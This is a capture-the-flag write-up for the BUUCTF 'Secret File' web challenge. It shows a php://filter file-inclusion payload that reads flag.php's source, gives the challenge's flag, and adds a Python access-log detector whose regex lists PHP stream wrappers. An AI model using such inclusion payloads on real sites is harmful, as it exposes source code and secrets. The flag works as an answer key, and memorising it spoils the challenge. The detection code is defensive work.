  • 【BUUCTF】WEB SECRET FILE

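    Noticed a redirect link; changing the colour reveals an anomaly.

    Following the link leads to action.php

    But clicking through lands on end.php

    Capture the request with Burp Suite:

    Inspecting the response reveals a redirect that references secr3t.php

    Viewing the source of secr3t.php reveals information about the flag:

    flag.php displays the following:

    Build a payload using a PHP pseudo-protocol (stream wrapper):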

    secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php

    This returns the base64-encoded source of flag.php:


    Decode the base64 with an online decoder:

    The flag is:

    flag{e35934b2-2559-4cdc-b304-a0a0e5f2ed3a}
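
The request above passes a php://filter wrapper through the file parameter, so the same pattern is visible in web server access logs. The following is an added example, not part of the original write-up: a log check that flags stream wrappers in query parameters and records which filter chain and resource were requested. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# PHP stream wrappers that should never arrive in a user-supplied file parameter.
WRAPPER = re.compile(r"\b(php|data|phar|zip|expect|glob|file)://", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding, up to `rounds` extra layers."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return one finding per query parameter that carries a stream wrapper."""
    m = REQUEST.search(line)
    if not m:
        return []
    findings = []
    for name, raw in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        value = fully_decode(raw)  # parse_qsl already removed one encoding layer
        w = WRAPPER.search(value)
        if not w:
            continue
        finding = {"param": name, "wrapper": w.group(1).lower(),
                   "filters": [], "resource": None}
        spec = value[w.end():]
        if finding["wrapper"] == "php" and spec.lower().startswith("filter/"):
            # php://filter/<filter>/.../resource=<target>: record what was read and how
            chain, _, resource = spec[len("filter/"):].partition("resource=")
            finding["filters"] = [f for f in chain.split("/") if f]
            finding["resource"] = resource or None
        findings.append(finding)
    return findings

# Constructed sample log lines (combined log format, documentation IP range).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2022:10:00:00 +0000] "GET /secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php HTTP/1.1" 200 1204',
    '203.0.113.7 - - [01/Jan/2022:10:00:05 +0000] "GET /secr3t.php?file=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dflag.php HTTP/1.1" 200 1204',
    '203.0.113.9 - - [01/Jan/2022:10:01:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        for hit in inspect_line(entry):
            print(hit)
```

A finding whose resource is a .php file together with a convert.base64-encode filter indicates source disclosure rather than normal page inclusion, which is the case this write-up walks through.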

  • Original article: https://www.cnblogs.com/p201721420021/p/15676051.html